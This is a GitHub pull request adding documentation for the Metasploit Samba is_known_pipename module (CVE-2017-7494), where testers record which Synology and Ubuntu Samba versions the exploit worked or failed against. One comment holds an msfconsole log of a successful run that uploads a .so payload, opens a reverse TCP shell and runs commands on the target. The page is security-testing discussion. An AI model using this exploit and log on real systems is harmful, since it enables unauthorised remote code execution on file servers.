Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

docs for is_known_pipename #15

Merged
merged 3 commits into from
May 25, 2017
Merged

docs for is_known_pipename #15

merged 3 commits into from
May 25, 2017

Conversation

h00die
Copy link

@h00die h00die commented May 25, 2017

Adds docs, plus keeps track of what people have and haven't had success with.

There are 4 spots that need more info, 2 from you @hdm , one from @OJ , and one from @wwebb-r7

But, its good to go none the less.

2. Synology DS412+ DSM 6.1.1-15101 Update 3 (Samba 4.4.9)
3. Ubuntu 16.04 (**HDM PLEASE PUT THE Samba version here**)
4. Synology **HDM PLEASE PUT THE DSM VERSION HERE** (**HDM PLEASE PUT THE Samba version here**)
5. Synology DS1512+ **OJ PLEASE PUT THE DSM VERSION HERE** (**OJ PLEASE PUT THE Samba version here**)
Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

DSM Version stuff:

DSM 6.1.1-15101 Update 2

Samba version stuff:

Version 4.4.9

Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Have updated to DSM 6.1.1-15101 Update 3 and it still works (Samba 4.4.9 as well).

Copy link

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Exploit failed: TypeError can't dup NilClass ?

@wwebb-r7
Copy link

My failure was against a WD MyCloud 4TB running Samba 4.0.0rc5

I'd add it myself but it appears to be an issue with the armle stub at this time.

@aconite33
Copy link

Ubuntu 14.04.05, x64
Samba 4.3.9

msf exploit(is_known_pipename) > run
[*] Started reverse TCP handler on 192.168.1.3:4444 
[*] 192.168.1.5:445 - Using location \\192.168.1.5\share\ for the path
[*] 192.168.1.5:445 - Payload is stored in //192.168.1.5/share/ as gVvHMTVH.so
[*] 192.168.1.5:445 - Trying location /volume1/gVvHMTVH.so...
...
[*] 192.168.1.5:445 - Trying location /tmp/gVvHMTVH.so...
[*] Command shell session 3 opened (192.168.1.3:4444 -> 192.168.1.5:45790) at 2017-05-05 02:44:06 -0400

id
uid=65534(nobody) gid=0(root) egid=65534(nogroup) groups=65534(nogroup)
uname -a
Linux ubuntu 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:07:32 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
dpkg -l samba
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name                               Version                          Architecture Description
+++-==================================-================================-============-===============================================================================
ii  samba                              2:4.3.9+dfsg-0ubuntu0.14.04.3    amd64        SMB/CIFS file, print, and login server for Unix

@hdm hdm merged commit 4ec5831 into hdm:module/CVE-2017-7494 May 25, 2017
@h00die h00die deleted the sambapwn branch May 26, 2017 17:41
hdm pushed a commit that referenced this pull request May 3, 2018
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

6 participants